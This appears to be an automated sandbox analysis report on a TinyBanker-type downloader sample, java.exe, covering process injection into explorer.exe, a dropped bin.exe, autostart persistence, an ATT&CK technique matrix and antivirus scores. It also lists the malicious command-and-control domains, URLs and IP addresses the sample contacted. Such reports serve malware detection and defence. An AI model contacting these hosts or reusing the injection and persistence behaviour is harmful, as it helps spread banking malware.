            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 740000Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe base: 1C0000Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe base: 1C0000Jump to behavior
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\SysWOW64\winver.exe winverJump to behavior
            Source: winver.exe, 00000002.00000002.2882940038.0000000002EEC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: tShell_TrayWndv&!&
            Source: java.exe, 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2912374874.0000000001340000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000002.2928191346.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1632657325.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000004.00000000.1712559103.000001CD41220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000003.00000000.1632391026.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2905026359.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
            Source: explorer.exe, 00000003.00000002.2928191346.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1632657325.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000004.00000000.1712559103.000001CD41220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: winver.exe, 00000002.00000002.2882940038.0000000002EEC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: tShell_TrayWnd
            Source: explorer.exe, 00000003.00000002.2928191346.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1632657325.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000004.00000000.1712559103.000001CD41220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\java.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133502574394086727.txt VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeQueries volume information: C:\ VolumeInformationJump to behavior

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            Valid Accounts1
            Exploitation for Client Execution            		11
            Registry Run Keys / Startup Folder            		512
            Process Injection            		3
            Rootkit            		1
            Credential API Hooking            		211
            Security Software Discovery            		Remote Services1
            Credential API Hooking            		Exfiltration Over Other Network Medium21
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
            Default AccountsScheduled Task/Job1
            DLL Side-Loading            		11
            Registry Run Keys / Startup Folder            		1
            Masquerading            		LSASS Memory1
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol11
            Archive Collected Data            		Exfiltration Over Bluetooth1
            Ingress Tool Transfer            		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            Domain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Virtualization/Sandbox Evasion            		Security Account Manager3
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Non-Application Layer Protocol            		Data Encrypted for ImpactDNS ServerEmail Addresses
            Local AccountsCronLogin HookLogin Hook512
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureTraffic Duplication13
            Application Layer Protocol            		Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
            Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Hidden Files and Directories            		Cached Domain Credentials111
            System Information Discovery            		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
            External Remote ServicesSystemd TimersStartup ItemsStartup Items21
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
            Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
            Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1378065 Sample: java.exe Startdate: 20/01/2024 Architecture: WINDOWS Score: 100 41 vcklmnnejwxx.pw 2->41 43 uyhgqunqkxnx.pw 2->43 45 7 other IPs or domains 2->45 53 Snort IDS alert for network traffic 2->53 55 Multi AV Scanner detection for domain / URL 2->55 57 Antivirus detection for URL or domain 2->57 59 7 other signatures 2->59 10 java.exe 1 2->10         started        signatures3 process4 signatures5 69 Exploit detected, runtime environment starts unknown processes 10->69 71 Writes to foreign memory regions 10->71 13 winver.exe 1 4 10->13         started        18 conhost.exe 10->18         started        process6 dnsIp7 49 fkmmvfeonnyh.pw 216.218.185.162, 49735, 49737, 49738 HURRICANEUS United States 13->49 51 uyhgqunqkxnx.pw 178.62.201.34, 49736, 80 DIGITALOCEAN-ASNUS European Union 13->51 39 C:\Users\user\AppData\Roaming\...\bin.exe, PE32 13->39 dropped 77 Creates autostart registry keys with suspicious names 13->77 79 Contains functionality to inject threads in other processes 13->79 81 Injects code into the Windows Explorer (explorer.exe) 13->81 83 4 other signatures 13->83 20 explorer.exe 15 8 13->20 injected 23 SearchApp.exe 13 13->23 injected 26 sihost.exe 13->26 injected 28 33 other processes 13->28 file8 signatures9 process10 dnsIp11 61 Contains functionality to inject threads in other processes 20->61 63 Writes to foreign memory regions 20->63 65 Creates a thread in another existing process (thread injection) 20->65 30 bin.exe 1 20->30         started        33 bin.exe 1 20->33         started        47 173.222.162.32, 443, 49730 AKAMAI-ASUS United States 23->47 67 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 23->67 signatures12 process13 signatures14 73 Antivirus detection for dropped file 30->73 75 Machine Learning detection for dropped file 30->75 35 conhost.exe 30->35         started        37 conhost.exe 33->37         started        process15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            java.exe89%ReversingLabsWin32.Downloader.TinyBanker
            java.exe90%VirustotalBrowse
            java.exe100%AviraHEUR/AGEN.1322420
            java.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe100%AviraHEUR/AGEN.1322420
            C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe100%Joe Sandbox ML

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            vcklmnnejwxx.pw14%VirustotalBrowse
            uyhgqunqkxnx.pw13%VirustotalBrowse
            mfueeimvyrsp.pw18%VirustotalBrowse
            cmnsgscccrej.pw13%VirustotalBrowse
            utmyhnffxpcj.pw18%VirustotalBrowse
            spaines.pw15%VirustotalBrowse
            fkmmvfeonnyh.pw18%VirustotalBrowse
            gfnlmtcolrrb.pw13%VirustotalBrowse
            evbsdqvgmpph.pw16%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://aefd.nelreports.net/api/report?cat=bingaotak0%URL Reputationsafe
            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
            https://%s.xboxlive.com0%URL Reputationsafe
            https://aefd.nelreports.net/api/report?cat=bingrms0%URL Reputationsafe
            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%URL Reputationsafe
            https://outlook.com_0%URL Reputationsafe
            https://powerpoint.office.comcember0%URL Reputationsafe
            http://schemas.micro0%URL Reputationsafe
            https://login.windows.local0%URL Reputationsafe
            https://aefd.nelreports.net/api/report?cat=wsb0%URL Reputationsafe
            https://%s.dnet.xboxlive.com0%URL Reputationsafe
            http://uyhgqunqkxnx.pw/EiDQjNbWEQ/13%VirustotalBrowse
            http://spaines.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            http://uyhgqunqkxnx.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            https://www.ng.com0%Avira URL Cloudsafe
            http://evbsdqvgmpph.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            https://powerpoint.office.comxee0%Avira URL Cloudsafe
            http://cmnsgscccrej.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            http://cmnsgscccrej.pw/EiDQjNbWEQ/17%VirustotalBrowse
            https://unitedstates4.ss.wd.microsoft.us0%Avira URL Cloudsafe
            http://mfueeimvyrsp.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            https://unitedstates2.ss.wd.microsoft.us0%Avira URL Cloudsafe
            http://evbsdqvgmpph.pw/EiDQjNbWEQ/15%VirustotalBrowse
            https://unitedstates1.ss.wd.microsoft.us0%Avira URL Cloudsafe
            https://searchapp.bundleassets.example/desktop/2.html0%Avira URL Cloudsafe
            https://assets.activity.windows.comer0%Avira URL Cloudsafe
            https://unitedstates2.ss.wd.microsoft.us0%VirustotalBrowse
            https://assets.activity.windows.coms0%Avira URL Cloudsafe
            http://mfueeimvyrsp.pw/EiDQjNbWEQ/9%VirustotalBrowse
            https://activity.windows.comt0%Avira URL Cloudsafe
            https://unitedstates1.ss.wd.microsoft.us1%VirustotalBrowse
            http://spaines.pw/EiDQjNbWEQ/12%VirustotalBrowse
            https://login.windows.local/0%Avira URL Cloudsafe
            http://gfnlmtcolrrb.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            http://vcklmnnejwxx.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            https://unitedstates4.ss.wd.microsoft.us1%VirustotalBrowse
            http://fkmmvfeonnyh.pw/EiDQjNbWEQ/100%Avira URL Cloudmalware
            https://excel.office.comcp0%Avira URL Cloudsafe
            http://gfnlmtcolrrb.pw/EiDQjNbWEQ/15%VirustotalBrowse
            http://fkmmvfeonnyh.pw/EiDQjNbWEQ/17%VirustotalBrowse
            http://vcklmnnejwxx.pw/EiDQjNbWEQ/12%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            vcklmnnejwxx.pw
            		216.218.185.162
            		truetrueunknown
            uyhgqunqkxnx.pw
            		178.62.201.34
            		truetrueunknown
            mfueeimvyrsp.pw
            		216.218.185.162
            		truetrueunknown
            spaines.pw
            		216.218.185.162
            		truetrueunknown
            cmnsgscccrej.pw
            		216.218.185.162
            		truetrueunknown
            evbsdqvgmpph.pw
            		216.218.185.162
            		truetrueunknown
            utmyhnffxpcj.pw
            		216.218.185.162
            		truetrueunknown
            gfnlmtcolrrb.pw
            		216.218.185.162
            		truetrueunknown
            fkmmvfeonnyh.pw
            		216.218.185.162
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://evbsdqvgmpph.pw/EiDQjNbWEQ/true
            • 15%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://uyhgqunqkxnx.pw/EiDQjNbWEQ/true
            • 13%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://spaines.pw/EiDQjNbWEQ/true
            • 12%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://cmnsgscccrej.pw/EiDQjNbWEQ/true
            • 17%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://mfueeimvyrsp.pw/EiDQjNbWEQ/true
            • 9%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://gfnlmtcolrrb.pw/EiDQjNbWEQ/true
            • 15%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://vcklmnnejwxx.pw/EiDQjNbWEQ/true
            • 12%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://fkmmvfeonnyh.pw/EiDQjNbWEQ/true
            • 17%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://aka.ms/odirmrexplorer.exe, 00000003.00000000.1634162143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
              		high
              https://assets.activity.windows.com/v1/assetssvchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                		high
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000002.3031801494.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      https://aefd.nelreports.net/api/report?cat=bingaotakSearchApp.exe, 0000000B.00000000.1771194064.0000024B423E8000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1755590053.0000024340029000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://excel.office.comexplorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://outlook.office.com/M365.AccessSearchApp.exe, 0000000B.00000000.1805286472.0000024B447CF000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000003.00000000.1638855988.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  https://substrate.office.com/SubstrateSearch-Internal.ReadWriteOSearchApp.exe, 0000000B.00000000.1829269370.0000024B55259000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://wns.windows.com/Lexplorer.exe, 00000003.00000002.3059382822.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1638855988.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://word.office.comexplorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2905023866.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1728659205.000001B98144E000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1829269370.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://%s.xboxlive.comsvchost.exe, 00000005.00000002.2919603174.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715089541.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		low
                                                      https://outlook.comStartMenuExperienceHost.exe, 00000009.00000002.2911384205.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1728745445.000001B9814D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://login.windows.net/svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://substrate.office.com/search/api/v1/events?scenario=SearchApp.exe, 0000000B.00000000.1829269370.0000024B55259000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://outlook.office.com/User.ReadWriteKSearchApp.exe, 0000000B.00000000.1763641682.0000024B41B40000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://aefd.nelreports.net/api/report?cat=bingrmsSearchApp.exe, 0000000B.00000000.1767315960.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://powerpoint.office.comxeeStartMenuExperienceHost.exe, 00000009.00000002.2905023866.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1728659205.000001B98144E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://outlook.com_explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		low
                                                                      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://fb.me/react-polyfillsThisSearchApp.exe, 0000000B.00000000.1808464287.0000024B44916000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://xsts.auth.xboxlive.com/svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://login.windows.netsvchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1771563723.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://windows.msn.com/shellSearchApp.exe, 0000000B.00000000.1752124326.0000024339C00000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://powerpoint.office.comcemberexplorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://xsts.auth.xboxlive.comsvchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1771563723.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.microexplorer.exe, 00000003.00000002.3045067363.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1635099926.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3023688229.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000A.00000002.2963352033.000001ECFC470000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://msit.loki.delve.office.com/apiQSearchApp.exe, 0000000B.00000000.1769589682.0000024B4218C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://login.windows.localsvchost.exe, 00000005.00000000.1715119977.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2921088315.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://substrate.office.com/M365.AccessSearchApp.exe, 0000000B.00000000.1763641682.0000024B41B40000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.ng.comSearchApp.exe, 0000000B.00000000.1771563723.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1829269370.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://api.msn.com/qexplorer.exe, 00000003.00000002.3031801494.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
